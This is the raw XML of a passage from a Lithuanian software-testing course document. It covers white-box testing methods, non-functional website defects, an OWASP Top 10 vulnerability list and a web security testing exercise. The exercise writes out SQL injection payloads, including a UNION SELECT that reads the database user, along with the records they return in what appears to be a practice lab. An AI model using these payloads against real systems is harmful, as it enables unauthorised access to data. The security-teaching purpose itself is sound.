            <w:r w:rsidRPr="00AD4464">
              <w:t>Baltosios dėžės testavimo metodai:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="002617AD" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Sakinių testa</w:t>
            </w:r>
            <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
              <w:t>vimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atšakų testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Kelių testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002342F7" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1.5.</w:t>
      </w:r>
      <w:r w:rsidR="00EC64C4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006472CE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Testuoti nefunkcinius programinės įrangos reikalavimus</w:t>
      </w:r>
      <w:r w:rsidR="00800B0B">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006472CE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>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NEFUNKCINIŲ REIKALAVIMŲ TESTAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00800B0B">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Keli nefunkcinių defektų pavyzdžiai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Skiltyje „TEISINĖ INFORMACIJA“ nėra turinio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">„Naujienos -&gt; Visos Naujienos“: Neišnaudojama ekrano erdvė. Naujienų yra labai daug, įrašai </w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>neišdėstomi puslapiais. Kas rei</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>škia, kad vidurinė (turinio) skiltis yra l</w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>abai ilga ir siaura. Šalia esanč</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ios skiltys yra tuščios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Paie</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ška: Ieškant pvz</w:t>
      </w:r>
      <w:r w:rsidR="000E5160" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pagal asmens vardą, yra pateikiami rezultatai. Tačiau tie rezulta</w:t>
      </w:r>
      <w:r w:rsidR="000E5160" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">tai yra pateikiami lentelės pavadinimu, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> yra neįskaitomi, tuo atveju, jei jie randami.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5579110" cy="3233420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="226" name="Paveikslėlis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579110" cy="3233420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="006472CE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ĮVADAS Į OWASP TOP  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00800B0B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3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037"/>
      </w:tblGrid>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1" w:name="_Toc14392573"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="381"/>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2" w:name="_Toc14392574"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Netinkama konfigūracija / netinkamai apibrėžtos kintamųjų reikšmės / atliekami kvietiniai į trečiųjų šalių servisus</w:t>
            </w:r>
            <w:bookmarkEnd w:id="382"/>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3" w:name="_Toc14392575"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="383"/>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384" w:name="_Toc14392576"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>įskiepis (SQL injection)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="384"/>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5" w:name="_Toc14392577"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:bookmarkEnd w:id="385"/>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6" w:name="_Toc14392578"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nesaugi captcha</w:t>
            </w:r>
            <w:bookmarkEnd w:id="386"/>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7" w:name="_Toc14392579"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:bookmarkEnd w:id="387"/>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8" w:name="_Toc14392580"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Netinkamas konfidencialių duomenų saugojimas/pateikimas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="388"/>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89" w:name="_Toc14392581"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:bookmarkEnd w:id="389"/>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0" w:name="_Toc14392582"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL įskiepis (SQL injection)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="390"/>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1" w:name="_Toc14392583"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:bookmarkEnd w:id="391"/>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392" w:name="_Toc14392584"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Netinkama konfigūracija (nepabaigta, arba atlikta neteisingai)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="392"/>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3" w:name="_Toc14392585"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:bookmarkEnd w:id="393"/>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4" w:name="_Toc14392586"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Netinkamas konfidencialių duomenų saugojimas/pateikimas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="394"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="81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5" w:name="_Toc14392587"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:bookmarkEnd w:id="395"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="903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396" w:name="_Toc14392588"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Netinkamas sesijų valdymas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="396"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00800B0B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1.6.</w:t>
      </w:r>
      <w:r w:rsidR="00C02AC4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00883D39" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mokymosi rezultatas.Testuoti programinės įrangos saugumą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00883D39" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ŽINIATINKLIO PROGRAMINĖS ĮRANGOS SAUGUMO TESTAVIMO PAGRINDAI IR ĮRANKIAI</w:t>
      </w:r>
      <w:r w:rsidR="008F2FA8">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Išbandome visada teigiam</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ą rezultatą grąžinančią užklausą:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> %' or '0'='0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Gauname rezultatą:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID: %' or '0'='0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>First name: admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: admin</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>First name: Gordon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: Brown</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>First name: Hack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: Me</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>First name: Pablo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: Picasso</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>First name: Bob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Surname: Smith</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Tuomet galime pabandyti gauti duomenų bazės vartotoją: %' or 0=0 union select null, user() # </w:t>
      </w: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First name: admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: admin</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First name: Gordon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: Brown</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First name: Hack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: Me</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First name: Pablo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Surname: Picasso</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First name: Bob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
